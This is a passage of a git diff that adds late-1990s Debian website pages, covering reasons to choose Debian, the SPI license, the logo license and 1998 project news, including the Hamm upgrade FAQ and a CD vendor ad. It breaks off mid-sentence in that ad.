as + not allowing sale for profit). Either something is public domain or it isn't - there + is no middle ground. Such licenses are meaningless and it is likely that the extra + conditions would not be upheld in court. +</UL> + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "intro", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/intro/why_debian.wml b/english/intro/why_debian.wml new file mode 100644 index 00000000000..002d5017981 --- /dev/null +++ b/english/intro/why_debian.wml @@ -0,0 +1,123 @@ +#!wml -o ../../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Reasons to Choose Debian" + +<H1>Reasons to Choose Debian</H1> + +<P>Thank you for considering using Debian GNU/Linux to run your machine. +If you aren't quite convinced why you should try Debian, consider the following: + +<UL> +<LI>It is maintained by its users. If something needs to be fixed or improved, we just + do it. +<LI>Unparalleled support. Mail sent to the + <A HREF="../support#mail_lists">mailing lists</A> often gets answers + within 15 minutes (or + less), for free, and by the people who developed it. Compare that to typical phone support: + hours spent on the phone, for money, only to get someone who doesn't know the system well + enough to even understand your question. +<LI>The best packaging system in the world. Tired of old files from software three + versions old + cluttering your system? Or installing a piece of software only to find it causes your + system to crash because of software conflicts? Dpkg, Debian's packaging system, was + created to take care of these issues for you. +<LI>Easy installation. If you have heard that Linux is difficult to install, + then you haven't tried Debian lately. We are constantly improving the installation + process and already have zero floppy installs. You can do the installation directly from + DOS or a CD. +<LI>Incredible amounts of software. Debian comes with over 1500 different pieces of software. + Every bit of it is free. If you have commercial software that runs under Linux, + you can still use it - in fact, there may even be an installer in Debian that will + automatically install and set up everything for you. +<LI>source-code. If you are a software developer, you will appreciate the fact + that there are hundreds of development tools and languages, plus millions of + lines of source code in the base system. All of the software in the main distribution + meets the criteria of the + <A HREF="../social_contract#guidelines">Debian Free Software Guidelines (DFSG)</A>. + This means that you can freely use this code to study from, or to incorporate into new free + software projects. There are also plenty of tools and code suitable for use in proprietary + projects. +<LI>Easy upgrades. Due to our packaging system, upgrading to a new version of Debian is a + snap. Just run dselect and you can upgrade from a CD in a matter of minutes or point + dselect at one of the over 75 Debian + <A HREF="../misc/README.mirrors">mirrors</A> and upgrade over the net. +<LI>Bug tracking system. Debian's bug tracking system is publicly available. We don't + try to hide the fact that software doesn't always work the way users want. Users + can submit bug reports and are notified when and why the bug was closed. This system + allows Debian to respond to problems quickly and honestly. + +</UL> + +<P>If you are not already a Linux user, you may also enjoy the following benefits: +<UL> +<LI>Stability. There are many cases of machines that run for over a year without rebooting. + Even then, they are only rebooted due to a power failure or a hardware upgrade. Compare + that to other systems that crash multiple times a day. +<LI>Fast and easy on memory. Other operating systems may be as fast in one or two areas, but + being based on Linux, Debian is lean and mean. Windows software run from Linux using + an emulator often runs FASTER from Linux than in the native environment. +<LI>Drivers for most hardware is written by Linux users, not the manufacturer. While this + can mean delays before new hardware is supported and no support for some hardware, + it enables support for hardware long after the manufacturer has stopped producing it + or gone out of business. Experience has shown that Open Source drivers are usually + much better than proprietary ones. +<LI>Good system security. Windows95 has essentially no security. NT has shown itself to + be very bad also. After years of development, Linux is becoming quite secure. + Being based on Linux, Debian benefits from this. Also, Debian is very responsive + to making sure that fixes to security problems get into the distribution quickly + (usually having fixed packages uploaded within a few days). + + <BR>History has shown that 'security through obscurity' does not work. The availability + of source code allows the security in Linux to be evaluated in an open setting which + prevents poor security models from being implemented. +<LI>Security software. Unknown to many, anything sent over the net can be + seen by any machine between you and the receiver. Debian has packages of the + famous PGP software which allows mail to be sent privately between users. + In addition, ssh allows you to create secure connections to other machines which + have ssh installed. + <BR><strong>Note:</strong> software using strong encryption may not be exported from + the US due to export restrictions. For this reason, this software is not part of + the regular Debian distribution. It is available on many of the Debian sites + outside the US though. +</UL> + +<P>Of course, Debian is not perfect. There are three areas that are common causes of complaints: +<UL> +<LI>"<A HREF="ftp://ftp.debian.org/debian/stable/disks-i386/current/dselect.beginner.8.html">Dselect</A> (the front end to Debian's packaging system) is confusing to learn". This is an active + area of work. It is hoped that the new package manager, apt, will be ready before the + release of Debian 2.1.<BR> + <strong>Note:</strong> Apt, the replacement for dselect is getting rave reviews, + No other Linux distribution has anything like it. It currently works well, and is + waiting for the development of the front-end before being released. +<LI>"Lack of popular commercial software". It is quite true that popular software, such as + Excel, is not available for Linux. Commercial software is coming out in greater numbers, + though, as more companies discover the power of Linux and its largely untapped market with a + rapidly growing user base (conservative estimates put the number of installations + between 5-10 million as of Feb 1998). For example, Netscape and Sun's JDK + are available for Linux. Lack of office suites should no longer be a problem as there + are now a number available: Applixware, StarOffice and WordPerfect8 (WordPerfect8 + even has a PowerPoint replacement). + For those interested in databases, Debian actually has a number of SQL + database programs to choose from (mSQL, mySQL and postgreSQL). +<LI>"Linux is hard to configure". Note that this says configure, not install, as many people + find the initial installation of Debian easier than Windows. A lot of hardware (printers + for example) + could be made easier to set up, though. Also, some software could have a script that would + walk the user through the configuration (at least for the most common setups). + This is an area that is being worked on. +<LI>Not all hardware is supported. Particularly, really new, really old, or really rare + hardware. Also hardware that is dependent on complex "driver" software that the + manufacturer only supplies for Windows platforms (WinModems for example). + However, in most cases, equivalent hardware is available that does work with Linux. + Some hardware is not supported because the vendor chooses not to make the hardware + specifications available. See the <A HREF="../OpenHardware/">Open Hardware Certification + Program</A> for our answer to this problem . +</UL> + +<P>If the above isn't enough to convince you to use Debian, consider the following: +low cost (as little as the cost of a phone call), easy installation, +and true multi-tasking that could easily double your productivity. +How can you afford not to try it? + +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "intro", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/license.wml b/english/license.wml new file mode 100644 index 00000000000..7f2ce5f01c3 --- /dev/null +++ b/english/license.wml @@ -0,0 +1,35 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — License" + +<H1>License</H1> + +<BLOCKQUOTE> +<P>Copyright © 1997-1998 Software in the Public Interest (SPI)<BR> +P.O. Box 70152<BR> +Pt. Richmond, CA 94807-0152. +</BLOCKQUOTE> + +<P>Verbatim copying and distribution is permitted in any medium, provided +this notice is preserved. + +<P>You may translate these documents and their license into another language +providing: +<UL> +<LI> You do not deliberately change their meaning beyond changes meant + to achieve a colloquial rendering in another language +<LI> Translations of the license must be clearly marked as translations, + and the license in its original language shall continue to apply to + all translations +<LI> In the case of hypertext pages, you must maintain a copy of the + original page on the same site, and must provide a link from the + translated page to its original. +</UL> + +<P>“Debian”, The Debian Penguin Logo, “Open Hardware”, +and the Open Hardware Logo are trademarks of Software in the Public +Interest, Inc. + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/logos/index.wml b/english/logos/index.wml new file mode 100644 index 00000000000..161f3f4f9e7 --- /dev/null +++ b/english/logos/index.wml @@ -0,0 +1,104 @@ +#!wml -o ../../../debian.org/logos/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Logo Page" + +<H1>Logo Page</H1> + +<P>Although Debian can be obtained for free and will always remain +that way, events such as the problem with the ownership of the +term "Linux" have shown that Debian needs to protect its +property from any use which could hurt its reputation. + +<P>It was thus decided to allow use of the Debian logo under the following license: +<H2>DEBIAN PENGUIN LOGO AUTOMATIC LICENSE</H2> + +<P>The Debian Penguin Logo is a Trademark of Software in the Public Interest, +Inc. You are granted an automatic license to use the logo on a software or +informational product or a service, and in advertising and promotion of +such products and services, provided that: + +<OL> +<LI>As modifications to this license are still being discussed, you may use + the logo under this license until 31 July 1998. The final version should + be ready by that time. +<LI>In the case of a software product, at least half of the product + must be derived from the Debian GNU/Linux Distribution. + +<LI>In the case of an informational product, such as a book or a set of web + pages, at least half of the content matter must be related to the + Debian GNU/Linux Distribution. + +<LI>In the case of a service, at least one half of the practice of the + service must be related to the use of the Debian GNU/Linux Distribution. + +<LI>Your product must not be intended to defame Software in the Public + Interest or the Debian GNU/Linux Distribution. + +<LI>You agree that Software in the Public Interest may withdraw permission + for you to use the logo under this license at any time, for any reason. + If permission is withdrawn, you will cease to apply the logo to your + product and other materials immediately. You may continue to sell your + pre-existing inventory of a physical medium (like a book or CD, or + advertising that has already been printed) containing the logo until + that inventory has been depleted. + +<LI>In the event of a legal dispute between you and Software in the Public + Interest, you agree to indemnify Software in the Public Interest against + any legal fees and penalties. +</OL> + +<P>If the rights granted by this license are not appropriate for your +product, you are encouraged to contact Software in the Public Interest +to negotiate an individual license. + +<HR> +<strong>Note:</strong> due to patent problems, there will be no gif versions of +the logo. + +<P><IMG SRC="debianlogo-2.jpg"> <A HREF="debianlogo-2.jpg">debianlogo-2.jpg</A> + <A HREF="debianlogo-2.png">debianlogo-2.png</A> + <A HREF="debianlogo-2.gif">debianlogo-2.gif</A> +<P><IMG SRC="debianlogo-3.jpg"> <A HREF="debianlogo-3.jpg">debianlogo-3.jpg</A> + <A HREF="debianlogo-3.png">debianlogo-3.png</A> + <A HREF="debianlogo-3.gif">debianlogo-3.gif</A> +<P><IMG SRC="debianlogo-4.jpg"> <A HREF="debianlogo-4.jpg">debianlogo-4.jpg</A> + <A HREF="debianlogo-4.png">debianlogo-4.png</A> + <A HREF="debianlogo-4.gif">debianlogo-4.gif</A> +<P><IMG SRC="debianlogo-5.jpg"> <A HREF="debianlogo-5.jpg">debianlogo-5.jpg</A> + <A HREF="debianlogo-5.png">debianlogo-5.png</A> + <A HREF="debianlogo-5.gif">debianlogo-5.gif</A> +<P><IMG SRC="debianlogo-6.jpg"> <A HREF="debianlogo-6.jpg">debianlogo-6.jpg</A> + <A HREF="debianlogo-6.png">debianlogo-6.png</A> + <A HREF="debianlogo-6.gif">debianlogo-6.gif</A> +<P><IMG SRC="debianlogo-2-notext.jpg"> <A HREF="debianlogo-2-notext.jpg">debianlogo-2-notext.jpg</A> + <A HREF="debianlogo-2-notext.png">debianlogo-2-notext.png</A> + <A HREF="debianlogo-2-notext.gif">debianlogo-2-notext.gif</A> +<P><IMG SRC="debianlogo-3-notext.jpg"> <A HREF="debianlogo-3-notext.jpg">debianlogo-3-notext.jpg</A> + <A HREF="debianlogo-3-notext.png">debianlogo-3-notext.png</A> + <A HREF="debianlogo-3-notext.gif">debianlogo-3-notext.gif</A> +<P><IMG SRC="debianlogo-4-notext.jpg"> <A HREF="debianlogo-4-notext.jpg">debianlogo-4-notext.jpg</A> + <A HREF="debianlogo-4-notext.png">debianlogo-4-notext.png</A> + <A HREF="debianlogo-4-notext.gif">debianlogo-4-notext.gif</A> +<P><IMG SRC="debianlogo-5-notext.jpg"> <A HREF="debianlogo-5-notext.jpg">debianlogo-5-notext.jpg</A> + <A HREF="debianlogo-5-notext.png">debianlogo-5-notext.png</A> + <A HREF="debianlogo-5-notext.gif">debianlogo-5-notext.gif</A> +<P><IMG SRC="debianlogo-6-notext.jpg"> <A HREF="debianlogo-6-notext.jpg">debianlogo-6-notext.jpg</A> + <A HREF="debianlogo-6-notext.png">debianlogo-6-notext.png</A> + <A HREF="debianlogo-6-notext.gif">debianlogo-6-notext.gif</A> +<P><FONT SIZE=+2><A HREF="debianlogo.fig">debianlogo.fig</A></FONT> +   Fig is a vector based graphics language. Install the Debian xfig + package to view or manipulate this version. +<P><FONT SIZE=+2><A HREF="debianlogo.draw">debianlogo.draw</A></FONT> +<P><FONT SIZE=+2><A HREF="debianlogo.ppm">debianlogo.ppm</A></FONT> +<P><FONT SIZE=+2><A HREF="debianlogo.ps">debianlogo.ps</A></FONT> + <FONT SIZE=+2><A HREF="debianlogo-notext.ps">debianlogo-notext.ps</A></FONT> + +<P>There were a number of other images created for possible use by Debian. +Many of them were quite good, but couldn't be used because they don't +fit the criteria for a logo. You can take a look at them at the +<A HREF="http://fatman.mathematik.tu-muenchen.de/~schwarz/debian-logo/">Debian +logo page</A>. + +<HR> +<P>Back to the <A href="./">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "logos", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/news.wml b/english/news.wml new file mode 100644 index 00000000000..59a2d5d92c9 --- /dev/null +++ b/english/news.wml @@ -0,0 +1,543 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Latest News" + +<H1>Latest News</H1> +<HR> +<UL> + +<LI><A HREF="#19980624">Debian v2.0 ("Hamm") Beta Test</A> + <SMALL>(24 Jun 1998)</SMALL> +<LI><A HREF="#19980606">Kachina Technologies, Inc. to help Debian Sparc development</A> + <SMALL>(06 Jun 1998)</SMALL> +<LI><A HREF="#19980523">New Debian Mailing List Set Up: debian-security-announce</A> + <SMALL>(23 May 1998)</SMALL> +<LI><A HREF="#19980522a">Hamm (development version of 2.0) Now in Deep Freeze</A> + <SMALL>(22 May 1998)</SMALL> +<LI><A HREF="#19980522b">XFree86 Announces Position on X11R6.4 Licensing</A> + <SMALL>(22 May 1998)</SMALL> +<LI><A HREF="#19980522c">Debian Developers to Speak at Linux Kongress</A> + <SMALL>(22 May 1998)</SMALL> +<LI><A HREF="#19980408">Debian to Use Only Free Versions of the X Window System</A> + <SMALL>(09 Apr 1998)</SMALL> +<LI><A HREF="#19980325">Code freeze (and rumours)</A> + <SMALL>(25 Mar 1998)</SMALL> +<LI><A HREF="#19980316a">SPI President to bring Free Software message to World Leaders!</A> + <SMALL>(16 Mar 1998)</SMALL> +<LI><A HREF="#19980316b">Novare Contributes Hardware to Debian</A> + <SMALL>(16 Mar 1998)</SMALL> +<LI><A HREF="#19980306a">Announcement About the Debian Trademark</A> + <SMALL>(06 Mar 1998)</SMALL> +<LI><A HREF="#19980306b">Netscape turns to Debian for Licensing Guidance!</A> + <SMALL>(06 Mar 1998)</SMALL> +<LI><A HREF="#19980223">MAPS: A Project Worthy of your Notice</A> + <SMALL>(23 Feb 1998)</SMALL> +<LI><A HREF="#19980203a">Debian GNU/Linux System Used to Develop Satellite</A> + <SMALL>(03 Feb 1998)</SMALL> +<LI><A HREF="#19980203b">Debian 2.0 Development Near Completion</A> + <SMALL>(03 Feb 1998)</SMALL> +<LI><A HREF="#19980203c">Revised Debian CD Available</A> + <SMALL>(03 Feb 1998)</SMALL> +<LI><A HREF="#19980125a">Debian Talks near You</A> + <SMALL>(25 Jan 1998)</SMALL> +<LI><A HREF="#19980125b">Debian Stability</A> + <SMALL>(25 Jan 1998)</SMALL> +<LI><A HREF="#19980125c">Debian Affiliates</A> + <SMALL>(25 Jan 1998)</SMALL> +<LI><A HREF="#19980104">Debian and the Millennium Bug</A> + <SMALL>(04 Jan 1998)</SMALL> +<LI><A HREF="#19980101">Happy New Year from the Debian Project</A> + <SMALL>(01 Jan 1998)</SMALL> +</UL> +<A HREF="news1997">View news from 1997</A> + + +<HR> +<H2><A NAME="19980624">24 Jun 1998: Debian v2.0 ("Hamm") Beta Test</A></H2> +<P>Though significantly delayed, Debian 2.0 ("Hamm") has officially been released +as "beta" for the i386 and m68k architectures. The packages on ftp.debian.org +are up to date and ready for downloads. Mirror sites are busy catching up on +the last few changes and should be complete by the end of the day (Thursday +morning at the absolute latest). + +<P>Debian 2.0 marks the move from the older libc5 to the newer libc6. Since +this is a significant change, we took a long time to make sure everything +was working correctly. + +<P>Changes to Hamm are restricted to important bug fixes so you should encounter +relatively few changes between now and the official release. I would +encourage those interested to go ahead with the Debian 1.3 ("Bo") to 2.0 +upgrade. This final bit of testing should help eliminate the remaining +upgrade/install problems likely to be encountered. + +<P>Debian distributions for Alpha, Sparc, and PowerPC are also available under +the "unstable" tree. They will likely release with Debian 2.1. + +<P>To avoid problems in just upgrading packages via dpkg, dselect, or dftp (due +to possible libc5/libc6 conflicts), it is recommended that the following +upgrade procedure be followed. This document can be found at + +<a href="http://bhmit1.home.ml.org/deb/faq">http://bhmit1.home.ml.org/deb/faq</a> +and +<a href="2.0/upgrade.faq">on the current site</a>. + +<P>Q: How do I upgrade from an earlier version of Debian?<BR> +A: There are several methods: + <OL> + <LI>autoup.sh - This is a script that will upgrade the programs in + the correct order, even download the deb's for you. Because of + the continuing changes to the archive, a tar archive of the + packages that were available at the time autoup.sh was last + released is provided. + Versions are available at:<BR> + <a href="2.0/autoup/">the current site</a><BR> + <a href="http://www.taz.net.au/autoup/">http://www.taz.net.au/autoup/</a><BR> + <a href="http://debian.vicnet.net.au/autoup/">http://debian.vicnet.net.au/autoup/</a><BR> + <a href="http://www.uk.debian.org/autoup/">http://www.uk.debian.org/autoup/</a> + (ftp: also okay) + <LI>apt-get - This is the command line part of Debian's future + package manager. It knows how to order packages and will + download them from a local archive, http, and ftp sites. It is + able to merge the info from several sites, so you can use your + cd, an up to date mirror, and a non-us site for the best mix of + speed, variety, and recentness (if you can't tell, I like this + one). Just run 'apt-get update; apt-get dist-upgrade'. The bo + version is at: <a href="http://www.debian.org/~jgg/">http://www.debian.org/~jgg/</a> + and <a href="2.0/apt-get.gz">on the current site</a>. + The hamm version is in project/experimental. + <LI>Do it by hand. There is a howto at: + <a href="http://www.gate.net/~storm/FAQ/libc5-libc6-Mini-HOWTO.html">http://www.gate.net/~storm/FAQ/libc5-libc6-Mini-HOWTO.html</a> + but the autoup.sh simply automates this, so most users won't + want to do this. + </OL> + +<HR> +<H2><A NAME="19980606">6 Jun 1998: Kachina Technologies, Inc. to help Debian Sparc + development</A></H2> +<P>Kachina Technologies, Inc. (<a href="http://kachinatech.com">http://kachinatech.com</a>) +has decided to help +make the Debian Sparc distribution commercially available to Linux +community. When ready, the Debian GNU/Linux 2.0 'Hamm' Sparc distribution +will be offered by Kachina on both CD-ROM and on preinstalled systems as +well. + +<P>When asked about their work with Linux, Ward Deng of Kachina stated: + +<P>"[Kachina] has been working on UltraSPARC systems and Linux for many years +and realized UltraSPARC and Linux is the best combination for +high-performance computing users. We have demonstrated an UltraLinux cluster +at a trade show and drew a lot of attention. + +<P>"We have been working on a native port of high-performance development +environment including Fujitsu Fortran 90, C, and other compiler/tools on the +Linux/UltraSPARC platform. + +<P>"We have been supporting UltraLinux port by providing loan systems to key +Sparc/Linux developers and we will continue doing so. Not only we will +provide remote access and network resource to Debian/UltraLinux developers, +we also intend to provide developers or early users preloaded systems at +prices below their costs to show our support and appreciation." + +<P>When asked why Debian was the distribution of choice, the reply was: + +<P>"Debian is obviously the best distribution so far. The Debian packaging +system and its organized volunteer-based development made it more +maintainable and guaranteed its openness in a long run." + +<P>Kachina is providing Internet access, disk space, a publicly accessible +test system, as well as manpower on software packaging and testing to help +the Debian Sparc effort. + +<P>Kachina also hosts Scientific Applications on Linux (SAL) +(http://sal.kachinatech.com), which is a collection of information and links +to software that is useful to scientists and engineers. + +<P>Debian GNU/Linux has been working on a Sparc distribution since November +1996. This distribution is expected to be ready for release within the next +few months. + +<P>For more information regarding Debian Sparc development, please subscribe to +the Debian Sparc mailing list +<<a href="mailto:debian-sparc@lists.debian.org">debian-sparc@lists.debian.org</A>>. +This can be done at <<a href="http://www.debian.org/MailingLists/subscribe">http://www.debian.org/MailingLists/subscribe</a>>. + +<P>For more information regarding the work Kachina is currently doing please +send email to +<a href="mailto:debian-ultralinux@KachinaTech.com">debian-ultralinux@KachinaTech.com</a>. + +<HR> +<H2><A NAME="19980523">23 May 1998: New Debian Mailing List Set Up: + debian-security-announce</A></H2> +<P>Debian-security-announce is a new mailing-list, dedicated to the +broadcasting of Debian Security Advisories. The advisories will document +security vulnerabilities in the current versions of Debian and provide +fixes, either as updated Debian packages to fetch and install or as +instructions for working around the security problem. +<P>The list is low-volume and digital (PGP) signatures are used for +moderation, so subscribing to it will not add a single piece of spam to +your mailbox. We encourage everyone to subscribe. + +<P>To subscribe: +<blockquote> + send email to <A HREF="mailto:debian-security-announce-REQUEST@lists.debian.org">debian-security-announce-REQUEST@lists.debian.org</A> + with the the single word 'subscribe' as the subject of the mail. +</blockquote> + +<P>An archive of past postings can be found at +<blockquote> + <A HREF="http://www.debian.org/Lists-Archives/">http://www.debian.org/Lists-Archives/</A> +</blockquote> + +<HR> +<H2><A NAME="19980522a">22 May 1998: Hamm (development version of 2.0) Now in Deep + Freeze</A></H2> +<P>Hamm has now been deep-frozen. Up until this point most new versions of +packages have have been allowed into the distribution as long as they were +bug fixes only. Now, the fix must both fix release-necessary bugs and +be deemed important enough by the head of engineering. + +<P>If anyone would like to help in the testing of the future 2.0, contact +Brandon Mitchell at <a href="mailto:bhmit1@mail.wm.edu">bhmit1@mail.wm.edu</a>. + +<HR> +<H2><A NAME="19980522b">22 May 1998: XFree86 Announces Position on X11R6.4 Licensing</A></H2> +<P>XFree86 has publicly announced their position on the new license accompanying +X11R6.4. The short story is that they will continue to develop XFree86 from +the X11R6.3 code. For the full story, see their +<A href="http://sunsite.doc.ic.ac.uk/XFree86/news/pr-980407.html">announcement</A>. + +<HR> +<H2><A NAME="19980522c">22 May 1998: Debian Developers to Speak at Linux Kongress</A></H2> +A number of Debian developers will be participating at the +<a href="http://www.linux-kongress.de/">Linux Kongress</a> +in Cologne, Germany in June. A list of Debian people participating can be found at +<a href="http://www.infodrom.north.de/Debian/cologne.html">http://www.infodrom.north.de/Debian/cologne.html</a>. + + +<HR> +<H2><A NAME="19980408">9 Apr 1998: Debian to Use Only Free Versions of the X Window + System</A></H2> +<P>We are dismayed by the recent decision by the `Open Group' not to +release future versions of X as free software - there will be +restrictions on commercial use, including large fees. + +<P>Debian's Social Contract promises that we will only promote software +which meets our Free Software Guidelines. These Guidelines require +availability for commercial as well as noncommercial use. + +<P>Debian cannot therefore ship versions of X derived from X11R6.4. +Instead we will base our releases on X11R6.3 (which is free); +we are confident that the free software community will rise to the +challenge of developing further free versions based on X11R6.3. + +<P>We note that XFree86 are currently considering their response to this +situation. We sincerely hope that they will retain their alignment +with the fully-free software community by not putting further work +into the new closed X distribution from the `Open Group'. + +<P>We would also encourage commercial vendors (whether aligned with the +free software community or not) to express their commitment to keep X +free. + +<P>The duplication of effort and loss of standardization involved in +splitting the development of X is unfortunate, but has been made +inevitable by the Open Group's decision to take X away from the free +software community. + +<HR> +<H2><A NAME="19980325">25 Mar 1998: Code freeze (and rumours)</A></H2> +<P>The following is a message from the leader of Debian, Ian Jackson: +<blockquote> +<P>The codefreeze for Debian 2.0, the libc6 system, is now in place, +and alpha and beta testing will start very soon. + +<P>There has been some confusion regarding Bruce Perens's relationship +with SPI (Software in the Public Interest, Debian's support and +umbrella organization). Bruce is the President of SPI, and felt he +was unhappy with certain aspects of the Debian Project's work. Ian +Murdock, Tim Sailer and I - the other board members of SPI - are +currently discussing with Bruce the future direction of SPI, and SPI's +relationship with Debian, and there is an ongoing discussion within +the Debian Project about these issues. + +<P>However, this will not distract us from our progress towards releasing +2.0. The Debian Project has a long tradition of apparent political +instability shortly before making releases, so you can be optimistic ! + +<P>Ian Jackson.<BR> +(Debian Project Leader) +</blockquote> + +<HR> +<H2><A NAME="19980316a">16 Mar 1998: SPI President to bring Free Software message to World +Leaders!</A></H2> +<P>Bruce Perens will speak about free software at the University of Chicago's +"The Challenge of Modern Democracy" conference, on April 10. C-Span is +covering the conference. Other confirmed speakers include Nobel Prize +winners, journalists such as Bernard Shaw of CNN, word leaders including +Canada's former Prime Minister, and Haiti's former President Aristide, +University Presidents (Harvard, MIT), among a variety of other scholars +from around the world. Perens is president of Software in the Public +Interest (Debian's corporation), and is astonished to find himself in +this list of speakers. Part or all of the conference will be televised, +we will bring you details as soon as we have them. + +<HR> +<H2><A NAME="19980316b">16 Mar 1998: Novare Contributes Hardware to Debian</A></H2> +<P>For a long time now Novare (<A HREF="http://www.novare.net">http://www.novare.net</A>) +has hosted the Debian +developer's central system. A few days ago, the motherboard on that system +blew out. They drove to the computer store on a Saturday, bought us a new +233MHz motherboard and new RAM, and rebuilt the system over that weekend. +Besides doing that, they built up a second system on their net for us to +use as a dedicated mailing-list server. + +<HR> +<H2><A NAME="19980306a">6 Mar 1998: Announcement About the Debian Trademark</A></H2> +<P>Debian's goal is to be fair to all businesses. Part of that is not +giving one business an advantage over another. + +<P>We allow all businesses to make reasonable use of the "Debian" trademark. +For example, if you make a CD of our Debian GNU/Linux distribution, +you can call that product "Debian". If you want to use the name in some +other way, you should ask us _first_. + +<P>To be fair to all businesses, we insist that no business use the name +"Debian" in the name of the business, or a domain name of the business. + +<P>A few times well-meaning people have called us just a bit too late to +keep them from losing a few hundred dollars and some time and being +disappointed. In all cases these people have meant well, and have +approached us with gifts in hand, and it is a shame to disappoint them. +Hopefully, this warning will protect the next person. + +<HR> +<H2><A NAME="19980306b">6 Mar 1998: Netscape turns to Debian for Licensing Guidance!</A></H2> +<P>When Netscape decided to make their client software free, they +used the Debian Free Software Guidelines for a guide on how to +write their license. You can find the draft Netscape license at +<A HREF="http://www.mozilla.org/NPL/">http://www.mozilla.org/NPL/</A>. +This is a historic day for us, since it +means that Netscape will eventually be in the "main" part of Debian +and all Linux systems, not the "non-free" section any longer! + +<P>A link to a press release (containing a quote of yours truly) can +be found at the bottom of that page. The Debian Social Contract and +licensing guidelines are at +<A HREF="http://www.debian.org/social_contract">http://www.debian.org/social_contract</A>. +A web page on the Open Source promotional program for free software can +be found at <A HREF="http://www.opensource.org/">http://www.opensource.org/</A>. + +<P>There is work yet to be done - a few license bug-lets will be resolved +within the next few days, and once the source code is released there are +some parts that Netscape does not own that will probably have to be +replaced with free software. + +<HR> +<H2><A NAME="19980223">23 Feb 1998: MAPS: A Project Worthy of your Notice</A></H2> +<P>Like most heavy Internet users, Debian developers have been plagued by +e-mail "spam". Recently, spammers have been even been posting messages +to our online bug-reporting system. Sales messages have been popping up +in between the bug reports. + +<P>Because of this, the Debian servers have joined MAPS, the Mail Abuse +Protection System. This is a network of system administrators that agree +to voluntarily refuse e-mail from sites that support spammers or have +poor anti-spam policies. Their web site is at +<A HREF="http://www.vix.com/">http://www.vix.com/</A>. MAPS +operates the Realtime Blackhole List. This is a system that allows them +to update the list of systems we refuse mail from instantly, and that +gives them the power to stop a spam in progress. Because so many systems +are participating, MAPS can get the attention of the offending sites and +can persuade them to reform their spam policies. MAPS also operates the +Transport Security Initiative, a program to educate innocent sites that +are used as relays by spammers in how to block spam. + +<P>MAPS has improved the entire Internet, and it's worthy of your support. +We are working on improvements to the Debian mail programs so that Debian +users will be able join MAPS with a single command. If you want to join +now, you can do so using the instructions at the MAPS web site: +<A HREF="http://maps.vix.com/rbl/usage.html">http://maps.vix.com/rbl/usage.html</A>. + +<HR> +<H2><A NAME="19980203a">3 Feb 1998: Debian GNU/Linux System Used to Develop Satellite</A></H2> +<P>You can read about the AMSAT Phase 3-D satellite at +<A HREF="http://www.amsat.org/amsat/sats/phase3d.html">http://www.amsat.org/amsat/sats/phase3d.html</A>. +It's the most ambitious +in a long series of Ham Radio satellites (more than 30 have been +launched). Some of the software for the satellite's communications +systems and experiments was developed by Bdale Garbee N3EUA, a +long-time Debian developer, and other Radio Amateurs, using the Debian +system. Debian is a good match for AMSAT: they are both international +groups of private individuals contributing their work to highly +sophisticated technical projects + +<HR> +<H2><A NAME="19980203b">3 Feb 1998: Debian 2.0 Development Near Completion</A></H2> +<P>The Debian 2.0 boot floppy package has been uploaded and is being +tested, and large-scale testing of the system is expected to begin soon. +2.0 will feature the GNU C library 2.0, also known as "LIBC 6". Several +incremental releases are expected follow 2.0 at short intervals. The new +package manager meant to replace "dselect" is now being demonstrated, and +will probably appear in 2.1 or one of the early point releases. +<BR>[dselect will still be available for those who want to use it. The new +package manager will allow package installation from X or from a text terminal. -ed.] + + +<HR> +<H2><A NAME="19980203c">3 Feb 1998: Revised Debian CD Available</A></H2> +<P>While you're waiting to upgrade to Debian 2.0, why not get the latest +Debian packages and an online version of the Debian book? Here's an +ad from Cheap*Bytes on their revised binary-only Debian CD for $2.49, +or binary+source for only $5.49 , or get the hard-copy book and +COMMERCIAL SUPPORT for $34: + +<blockquote> +<P><STRONG>Debian GNU/Linux 1.3.1 Revision 6 ------> $ 2.49 each</STRONG> + +<P>Debian Linux can be used as a UNIX (r) workstation for purposes from +running Web Servers to software development. + +<P>This Debian GNU/Linux CD-ROM features: +<UL> + <LI>updates since the original release of Debian 1.3.1 + <LI>2.0.32 Kernel + <LI>Updated Perl + <LI>Debian User Guide in HTML Format + <LI>Floppy less install saving you the effort of hunting + down floppy diskettes <grin>. +</UL> + +<P>Other Product Variations +<UL> + <LI>Debian Users Guide + 3 Archive CDs + Rev. 6 CD + Support (7 CDs) -> $34.00 + <LI>Official GNU/Linux 1.3.1 + Rev. 6 CD (3 CDs) ---------------------> $ 5.49 + <LI>Debian GNU/Linux 1.3.1 Rev. 6 CD + 3 Archive CDs (4 CDs) ---------> $ 6.99 +</UL> + +<STRONG>1. ORDERING INFORMATION</STRONG><BR> +To order with your chargecard, you can use our *SECURED* web page at: + +<A HREF="http://www.cheapbytes.com">http://www.cheapbytes.com</A> + +<P>Or just send us e-mail to +<A HREF="mailto:sales@cheapbytes.com">sales@cheapbytes.com</A> for details if you do not +have Web access. + +<P>For shipments in the United States and Canada, a check in U.S. dollars +can be sent in the amount of $7.49 to cover shipping and handling and +the cost of the CD product to: + +<P>CheapBytes<BR> +P.O. Box 2714<BR> +Lodi, CA 95241 + +<P>COD orders are not accepted for this product. For international +orders, please see our shipping schedule at www.cheapbytes.com/shiprate.htm + +<P>Shipping charges will be applied depending on destination. Orders for +just this product will be shipped via U.S. First Class Mail or U.S. Airmail +depending on destination. For shipping and handling charges, please review +our Web page. All prices are in U.S. dollars. + +<P>International and chargecard orders are both gladly accepted. +Checks and money orders are accepted which are drawn in U.S. dollars. +Please see our web page to acquire an order form. + +<P>The $ 2.49 price is for the Intel(tm) platform. We accept multiple +CD orders of this product. Buy enough for your whole block or 